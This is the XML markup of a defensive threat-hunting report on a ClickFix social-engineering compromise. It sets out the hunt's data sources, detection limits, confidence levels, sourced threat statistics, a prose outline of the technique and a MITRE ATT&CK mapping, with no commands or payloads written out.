    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">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Time window:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:spacing w:after="0" w:before="60" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Last 30 days of events, across the entire fleet running Defender for Endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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Data sources used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="80" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Sentinel — Defender for Endpoint tables (DeviceProcessEvents, DeviceRegistryEvents, DeviceNetworkEvents and DeviceFileEvents) and the PowerShell operational log (Script Block Logging, event 4104): 7 KQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="80" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sandbox (ANY.RUN) to detonate the downloaded MSI and confirm its behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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Key limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">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RunMRU only covers Win+R.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The lineage query adds FileFix, but a command pasted into an already open console (cmd, PowerShell or the Win+X Terminal) shows up neither in RunMRU nor with explorer.exe as its parent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">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The clipboard is not logged.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> There is no way to know which page copied the command, only what was pasted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">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Script Block Logging splits large scripts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> across several 4104 events: a search with two terms can come back empty if they land in different blocks. And a host without the policy enabled contributes no script content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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The extension’s WebSocket channel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (port 4343) does not show up in DeviceNetworkEvents within the analyzed window, so that channel is inconclusive.</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Ingestion latency</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of several minutes between Defender for Endpoint and Sentinel: a query over the last few minutes may not yet see what already happened.</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Defender aggregates some network connections and reports them late</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ActionType ConnectionSuccessAggregatedReport): a narrow time window may miss them.</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Browser Preferences files are only partially recorded:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the positive control tests they only showed up as FileRenamed, and a direct write was not recorded. Zero results in query 6 do not rule out persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confidence level:</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high</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> confidence that XXXX-01 was compromised through this chain (multiple independent sources: processes, registry, scripts, network, files and sandbox). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Moderate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> confidence that no other hosts are affected, because the main queries do not see a command pasted into an already open console.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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78fcq79eiwqq" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BACKGROUND AND THREAT INTELLIGENCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ClickFix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a social engineering technique in which a fake page (a CAPTCHA, a “verify you are human”, a loading error) copies a command to the clipboard and asks the victim to paste and run it. There is no attachment and no exploit: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the user runs the command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, with Microsoft-signed binaries.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829"/>
        <w:gridCol w:w="2500"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1700"/>
            <w:gridCol w:w="4829"/>
            <w:gridCol w:w="25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4F">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Data point</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50">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">What it means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51">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Source · Admiralty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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">of the initial access cases seen by Microsoft Defender Experts in the past year were ClickFix (phishing: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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Microsoft, Digital Defense Report 2025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0" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">+517%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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">growth between H2 2024 and H1 2025: second vector behind phishing.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ESET Threat Report H1 2025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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4 out of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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ClickFix payloads intercepted in 2026 arrived from a search engine (Google, Bing), not from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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Push Security, Sep. 2026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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">17,000+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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">URLs with fake verification pages analyzed; about 3,000 still active at the time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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CTM360, via SecNews, Sep. 2026 · B3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Admiralty grading assigned by the team: source reliability (A–F) and information credibility (1–6). The CTM360 figure gets a 3 because it was taken from a news outlet, without access to the original report.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">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The victim searches for something (music, software, a “fix”) and opens a search result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">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The page shows a fake error or a CAPTCHA and copies a PowerShell command to the clipboard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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The victim presses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Win+R</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Ctrl+V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">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The command downloads and runs the next stage with the user’s session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implication for the hunter:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> it comes in through search, not email. The email gateway does not see it; the EDR does, but logs it as normal user activity, with no alert. Variants change fast (FileFix, Win+X with Terminal, the macOS version), so the hypothesis is written about </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">behavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, not about IOCs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">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9asiyftdowrf" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</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000"/>
        <w:gridCol w:w="3729"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3300"/>
            <w:gridCol w:w="2000"/>
            <w:gridCol w:w="37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67">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Technique (name and ID)</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8">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tactic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69">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence in this case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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1204.004 – Malicious Copy and Paste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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Execution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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command pasted into Win+R: explorer.exe launches PowerShell and writes RunMRU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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1059.001 – PowerShell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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Execution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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
